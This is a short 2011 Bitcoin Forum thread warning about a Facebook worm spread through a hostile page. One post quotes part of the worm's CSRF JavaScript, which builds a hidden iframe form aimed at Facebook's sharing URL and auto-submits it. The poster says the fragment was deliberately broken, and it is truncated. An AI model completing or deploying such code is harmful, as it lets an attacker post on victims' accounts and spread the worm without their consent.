Bitcoin Forum
Author Topic: XSS / CSFR Facebook hostile-page  (Read 897 times)
July 03, 2011, 11:31:31 PM

For people who keep wondering about XSS and CSRF, here's an example of what it can do. This example is a new Facebook worm, which spreads by pointing users at this page: hxxp:// (link replaced with hxxp). Make sure you have JavaScript disabled before you try it, then you can look at the source.

This is also a warning, just in case a friend of yours has posted some crap like this to his or your wall.
July 06, 2011, 05:16:49 PM

Sharing the part that does the CSRF here, for those who are interested...

function jacks(site,params){
var div = document.createElement('div');
div.innerHTML = '<iframe></iframe>';
var iframe = div.firstChild;
var iframeDocument = iframe.documentHandler;;
var form = iframeDocument.createElement('form');
for (param in params){
var field = iframeDocument.createElement('input');
field.setAttribute('type', 'hidden');
field.setAttribute('name', param);
field.setAttribute('value', params[param]);
What this code roughly does is create an iframe with a form that is set to a specific Facebook sharing URL (the same one called by their on-site sharing functionality), insert a specific set of "parameters" (form fields) and corresponding values, and automatically submit the form. This is all done in the background, of course. The target URL and parameters can be specified in this function.

The code I posted here was edited to need some work before it works, to discourage script kiddies.

EDIT: Of course this could be executed from any page. You could be visiting some random page with comics, and it could technically have this code in it.

Like my post(s)? 12TSXLa5Tu6ag4PNYCwKKSiZsaSCpAjzpu Smiley
Quote from: hawks5999
I just can't wait for fall/winter. My furnace never generated money for me before. I'll keep mining until my furnace is more profitable.